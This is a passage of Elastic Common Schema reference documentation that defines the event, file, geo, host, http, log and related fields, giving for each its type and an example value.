if one exists. +Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. 
+ +type: keyword + +example: 4648 + +-- + +*`event.created`*:: ++ +-- +event.created contains the date/time when the event was first read by an agent, or by your pipeline. +This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. +In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. +In case the two timestamps are identical, @timestamp should be used. + +type: date + +example: 2016-05-23T08:05:34.857Z + +-- + +*`event.dataset`*:: ++ +-- +Name of the dataset. +If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. +It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. + +type: keyword + +example: apache.access + +-- + +*`event.duration`*:: ++ +-- +Duration of the event in nanoseconds. +If event.start and event.end are known this value should be the difference between the end and start time. + +type: long + +format: duration + +-- + +*`event.end`*:: ++ +-- +event.end contains the date when the event ended or when the activity was last observed. + +type: date + +-- + +*`event.hash`*:: ++ +-- +Hash (perhaps logstash fingerprint) of raw field to be able to demonstrate log integrity. + +type: keyword + +example: 123456789012345678901234567890ABCD + +-- + +*`event.id`*:: ++ +-- +Unique ID to describe the event. + +type: keyword + +example: 8a4f500d + +-- + +*`event.ingested`*:: ++ +-- +Timestamp when an event arrived in the central data store. +This is different from `@timestamp`, which is when the event originally occurred. 
It's also different from `event.created`, which is meant to capture the first time an agent saw the event. +In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` < `event.created` < `event.ingested`. + +type: date + +example: 2016-05-23T08:05:35.101Z + +-- + +*`event.kind`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. +`event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. +The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. + +type: keyword + +example: alert + +-- + +*`event.module`*:: ++ +-- +Name of the module this data is coming from. +If your monitoring agent supports the concept of modules or plugins to process events of a given source (e.g. Apache logs), `event.module` should contain the name of this module. + +type: keyword + +example: apache + +-- + +*`event.original`*:: ++ +-- +Raw text message of entire event. Used to demonstrate log integrity. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. + +type: keyword + +example: Sep 19 08:26:10 host CEF:0|Security| threatmanager|1.0|100| worm successfully stopped|10|src=10.0.0.1 dst=2.1.2.2spt=1232 + +Field is not indexed. + +-- + +*`event.outcome`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. 
+`event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. +Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. +Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. +Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. + +type: keyword + +example: success + +-- + +*`event.provider`*:: ++ +-- +Source of the event. +Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). + +type: keyword + +example: kernel + +-- + +*`event.reason`*:: ++ +-- +Reason why this event happened, according to the source. +This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). + +type: keyword + +example: Terminated an unexpected process + +-- + +*`event.reference`*:: ++ +-- +Reference URL linking to additional information about this event. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. 
+ +type: keyword + +example: https://system.example.com/event/#0001234 + +-- + +*`event.risk_score`*:: ++ +-- +Risk score or priority of the event (e.g. security solutions). Use your system's original value here. + +type: float + +-- + +*`event.risk_score_norm`*:: ++ +-- +Normalized risk score or priority of the event, on a scale of 0 to 100. +This is mainly useful if you use more than one system that assigns risk scores, and you want to see a normalized value across all systems. + +type: float + +-- + +*`event.sequence`*:: ++ +-- +Sequence number of the event. +The sequence number is a value published by some event sources, to make the exact ordering of events unambiguous, regardless of the timestamp precision. + +type: long + +format: string + +-- + +*`event.severity`*:: ++ +-- +The numeric severity of the event according to your event source. +What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. +The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. + +type: long + +example: 7 + +format: string + +-- + +*`event.start`*:: ++ +-- +event.start contains the date when the event started or when the activity was first observed. + +type: date + +-- + +*`event.timezone`*:: ++ +-- +This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. +Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). 
+ +type: keyword + +-- + +*`event.type`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. +`event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. +This field is an array. This will allow proper categorization of some events that fall in multiple event types. + +type: keyword + +-- + +*`event.url`*:: ++ +-- +URL linking to an external system to continue investigation of this event. +This URL links to another system where in-depth investigation of the specific occurrence of this event can take place. Alert events, indicated by `event.kind:alert`, are a common use case for this field. + +type: keyword + +example: https://mysystem.example.com/alert/5271dedb-f5b0-4218-87f0-4ac4870a38fe + +-- + +[float] +=== file + +A file is defined as a set of information that has been created on, or has existed on a filesystem. +File objects can be associated with host events, network events, and/or file events (e.g., those produced by File Integrity Monitoring [FIM] products or services). File fields provide details about the affected file associated with the event or metric. + + +*`file.accessed`*:: ++ +-- +Last time the file was accessed. +Note that not all filesystems keep track of access time. + +type: date + +-- + +*`file.attributes`*:: ++ +-- +Array of file attributes. +Attributes names will vary by platform. Here's a non-exhaustive list of values that are expected in this field: archive, compressed, directory, encrypted, execute, hidden, read, readonly, system, write. + +type: keyword + +example: ["readonly", "system"] + +-- + +*`file.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. 
+This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`file.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`file.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`file.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`file.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`file.created`*:: ++ +-- +File creation time. +Note that not all filesystems store the creation time. + +type: date + +-- + +*`file.ctime`*:: ++ +-- +Last time the file attributes or metadata changed. +Note that changes to the file content will update `mtime`. This implies `ctime` will be adjusted at the same time, since `mtime` is an attribute of the file. + +type: date + +-- + +*`file.device`*:: ++ +-- +Device that is the source of the file. + +type: keyword + +example: sda + +-- + +*`file.directory`*:: ++ +-- +Directory where the file is located. It should include the drive letter, when appropriate. 
+ +type: keyword + +example: /home/alice + +-- + +*`file.drive_letter`*:: ++ +-- +Drive letter where the file is located. This field is only relevant on Windows. +The value should be uppercase, and not include the colon. + +type: keyword + +example: C + +-- + +*`file.extension`*:: ++ +-- +File extension, excluding the leading dot. +Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). + +type: keyword + +example: png + +-- + +*`file.gid`*:: ++ +-- +Primary group ID (GID) of the file. + +type: keyword + +example: 1001 + +-- + +*`file.group`*:: ++ +-- +Primary group name of the file. + +type: keyword + +example: alice + +-- + +*`file.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`file.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`file.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`file.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`file.inode`*:: ++ +-- +Inode representing the file in the filesystem. + +type: keyword + +example: 256383 + +-- + +*`file.mime_type`*:: ++ +-- +MIME type should identify the format of the file or stream of bytes using https://www.iana.org/assignments/media-types/media-types.xhtml[IANA official types], where possible. When more than one type is applicable, the most specific type should be used. + +type: keyword + +-- + +*`file.mode`*:: ++ +-- +Mode of the file in octal representation. + +type: keyword + +example: 0640 + +-- + +*`file.mtime`*:: ++ +-- +Last time the file content was modified. + +type: date + +-- + +*`file.name`*:: ++ +-- +Name of the file including the extension, without the directory. + +type: keyword + +example: example.png + +-- + +*`file.owner`*:: ++ +-- +File owner's username. + +type: keyword + +example: alice + +-- + +*`file.path`*:: ++ +-- +Full path to the file, including the file name. 
It should include the drive letter, when appropriate. + +type: keyword + +example: /home/alice/example.png + +-- + +*`file.path.text`*:: ++ +-- +type: text + +-- + +*`file.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`file.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`file.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`file.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`file.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`file.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`file.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`file.size`*:: ++ +-- +File size in bytes. +Only relevant when `file.type` is "file". + +type: long + +example: 16384 + +-- + +*`file.target_path`*:: ++ +-- +Target path for symlinks. + +type: keyword + +-- + +*`file.target_path.text`*:: ++ +-- +type: text + +-- + +*`file.type`*:: ++ +-- +File type (file, dir, or symlink). + +type: keyword + +example: file + +-- + +*`file.uid`*:: ++ +-- +The user ID (UID) or security identifier (SID) of the file owner. 
+ +type: keyword + +example: 1001 + +-- + +*`file.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`file.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`file.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`file.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`file.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`file.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`file.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`file.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`file.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`file.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`file.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`file.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. 
+ +type: keyword + +example: nistp521 + +-- + +*`file.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`file.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`file.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`file.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`file.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`file.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`file.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`file.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`file.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`file.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`file.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`file.x509.version_number`*:: ++ +-- +Version of x509 format. 
+ +type: keyword + +example: 3 + +-- + +[float] +=== geo + +Geo fields can carry data about a specific location related to an event. +This geolocation information can be derived from techniques such as Geo IP, or be user-supplied. + + +*`geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +[float] +=== group + +The group fields are meant to represent groups that are relevant to the event. + + +*`group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. 
+ +type: keyword + +-- + +*`group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +[float] +=== hash + +The hash fields represent different bitwise hash algorithms and their values. +Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). + + +*`hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +[float] +=== host + +A host is defined as a general computing instance. +ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes. + + +*`host.architecture`*:: ++ +-- +Operating system architecture. + +type: keyword + +example: x86_64 + +-- + +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. 
+ +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.domain`*:: ++ +-- +Name of the domain of which the host is a member. +For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. + +type: keyword + +example: CONTOSO + +-- + +*`host.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`host.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`host.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`host.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`host.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`host.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`host.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`host.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. 
+ +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`host.hostname`*:: ++ +-- +Hostname of the host. +It normally contains what the `hostname` command returns on the host machine. + +type: keyword + +-- + +*`host.id`*:: ++ +-- +Unique host id. +As hostname is not always unique, use values that are meaningful in your environment. +Example: The current usage of `beat.name`. + +type: keyword + +-- + +*`host.ip`*:: ++ +-- +Host ip addresses. + +type: ip + +-- + +*`host.mac`*:: ++ +-- +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + +-- + +*`host.name`*:: ++ +-- +Name of the host. +It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. + +type: keyword + +-- + +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`host.os.full`*:: ++ +-- +Operating system name, including the version or code name. 
+ +type: keyword + +example: Mac OS Mojave + +-- + +*`host.os.full.text`*:: ++ +-- +type: text + +-- + +*`host.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`host.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`host.os.name.text`*:: ++ +-- +type: text + +-- + +*`host.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`host.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`host.type`*:: ++ +-- +Type of host. +For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. + +type: keyword + +-- + +*`host.uptime`*:: ++ +-- +Seconds the host has been up. + +type: long + +example: 1325 + +-- + +*`host.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`host.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`host.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`host.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`host.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. 
+ +type: keyword + +-- + +*`host.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`host.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`host.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`host.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`host.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`host.user.name.text`*:: ++ +-- +type: text + +-- + +*`host.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== http + +Fields related to HTTP activity. Use the `url` field set to store the url of the request. + + +*`http.request.body.bytes`*:: ++ +-- +Size in bytes of the request body. + +type: long + +example: 887 + +format: bytes + +-- + +*`http.request.body.content`*:: ++ +-- +The full HTTP request body. + +type: keyword + +example: Hello world + +-- + +*`http.request.body.content.text`*:: ++ +-- +type: text + +-- + +*`http.request.bytes`*:: ++ +-- +Total size in bytes of the request (body and headers). + +type: long + +example: 1437 + +format: bytes + +-- + +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + +*`http.request.method`*:: ++ +-- +HTTP request method. +Prior to ECS 1.6.0 the following guidance was provided: +"The field value must be normalized to lowercase for querying." 
+As of ECS 1.6.0, the guidance is deprecated because the original case of the method may be useful in anomaly detection. Original case will be mandated in ECS 2.0.0 + +type: keyword + +example: GET, POST, PUT, PoST + +-- + +*`http.request.mime_type`*:: ++ +-- +Mime type of the body of the request. +This value must only be populated based on the content of the request body, not on the `Content-Type` header. Comparing the mime type of a request with the request's Content-Type header can be helpful in detecting threats or misconfigured clients. + +type: keyword + +example: image/gif + +-- + +*`http.request.referrer`*:: ++ +-- +Referrer for this HTTP request. + +type: keyword + +example: https://blog.example.com/ + +-- + +*`http.response.body.bytes`*:: ++ +-- +Size in bytes of the response body. + +type: long + +example: 887 + +format: bytes + +-- + +*`http.response.body.content`*:: ++ +-- +The full HTTP response body. + +type: keyword + +example: Hello world + +-- + +*`http.response.body.content.text`*:: ++ +-- +type: text + +-- + +*`http.response.bytes`*:: ++ +-- +Total size in bytes of the response (body and headers). + +type: long + +example: 1437 + +format: bytes + +-- + +*`http.response.mime_type`*:: ++ +-- +Mime type of the body of the response. +This value must only be populated based on the content of the response body, not on the `Content-Type` header. Comparing the mime type of a response with the response's Content-Type header can be helpful in detecting misconfigured servers. + +type: keyword + +example: image/gif + +-- + +*`http.response.status_code`*:: ++ +-- +HTTP response status code. + +type: long + +example: 404 + +format: string + +-- + +*`http.version`*:: ++ +-- +HTTP version. + +type: keyword + +example: 1.1 + +-- + +[float] +=== interface + +The interface fields are used to record ingress and egress interface information when reported by an observer (e.g. 
firewall, router, load balancer) in the context of the observer handling a network connection. In the case of a single observer interface (e.g. network sensor on a span port) only the observer.ingress information should be populated. + + +*`interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + +[float] +=== log + +Details about the event's logging mechanism or logging transport. +The log.* fields are typically populated with details about the logging mechanism used to create and/or transport the event. For example, syslog details belong under `log.syslog.*`. +The details specific to your event source are typically not logged under `log.*`, but rather in `event.*` or in other ECS fields. + + +*`log.file.path`*:: ++ +-- +Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. +If the event wasn't read from a log file, do not populate this field. + +type: keyword + +example: /var/log/fun-times.log + +-- + +*`log.level`*:: ++ +-- +Original log level of the log event. +If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). +Some examples are `warn`, `err`, `i`, `informational`. + +type: keyword + +example: error + +-- + +*`log.logger`*:: ++ +-- +The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. 
+ +type: keyword + +example: org.elasticsearch.bootstrap.Bootstrap + +-- + +*`log.origin.file.line`*:: ++ +-- +The line number of the file containing the source code which originated the log event. + +type: integer + +example: 42 + +-- + +*`log.origin.file.name`*:: ++ +-- +The name of the file containing the source code which originated the log event. +Note that this field is not meant to capture the log file. The correct field to capture the log file is `log.file.path`. + +type: keyword + +example: Bootstrap.java + +-- + +*`log.origin.function`*:: ++ +-- +The name of the function or method which originated the log event. + +type: keyword + +example: init + +-- + +*`log.original`*:: ++ +-- +This is the original log message and contains the full log message before splitting it up in multiple parts. +In contrast to the `message` field which can contain an extracted part of the log message, this field contains the original, full log message. It can have already some modifications applied like encoding or new lines removed to clean up the log message. +This field is not indexed and doc_values are disabled so it can't be queried but the value can be retrieved from `_source`. + +type: keyword + +example: Sep 19 08:26:10 localhost My log + +Field is not indexed. + +-- + +*`log.syslog`*:: ++ +-- +The Syslog metadata of the event, if the event was transmitted via Syslog. Please see RFCs 5424 or 3164. + +type: object + +-- + +*`log.syslog.facility.code`*:: ++ +-- +The Syslog numeric facility of the log event, if available. +According to RFCs 5424 and 3164, this value should be an integer between 0 and 23. + +type: long + +example: 23 + +format: string + +-- + +*`log.syslog.facility.name`*:: ++ +-- +The Syslog text-based facility of the log event, if available. + +type: keyword + +example: local7 + +-- + +*`log.syslog.priority`*:: ++ +-- +Syslog numeric priority of the event, if available. +According to RFCs 5424 and 3164, the priority is 8 * facility + severity. 
This number is therefore expected to contain a value between 0 and 191. + +type: long + +example: 135 + +format: string + +-- + +*`log.syslog.severity.code`*:: ++ +-- +The Syslog numeric severity of the log event, if available. +If the event source publishing via Syslog provides a different numeric severity value (e.g. firewall, IDS), your source's numeric severity should go to `event.severity`. If the event source does not specify a distinct severity, you can optionally copy the Syslog severity to `event.severity`. + +type: long + +example: 3 + +-- + +*`log.syslog.severity.name`*:: ++ +-- +The Syslog numeric severity of the log event, if available. +If the event source publishing via Syslog provides a different severity value (e.g. firewall, IDS), your source's text severity should go to `log.level`. If the event source does not specify a distinct severity, you can optionally copy the Syslog severity to `log.level`. + +type: keyword + +example: Error + +-- + +[float] +=== network + +The network is defined as the communication path over which a host or network event happens. +The network.* fields should be populated with details about the network activity associated with an event. + + +*`network.application`*:: ++ +-- +A name given to an application level protocol. This can be arbitrarily assigned for things like microservices, but also apply to things like skype, icq, facebook, twitter. This would be used in situations where the vendor or service can be decoded such as from the source/dest IP owners, ports, or wire format. +The field value must be normalized to lowercase for querying. See the documentation section 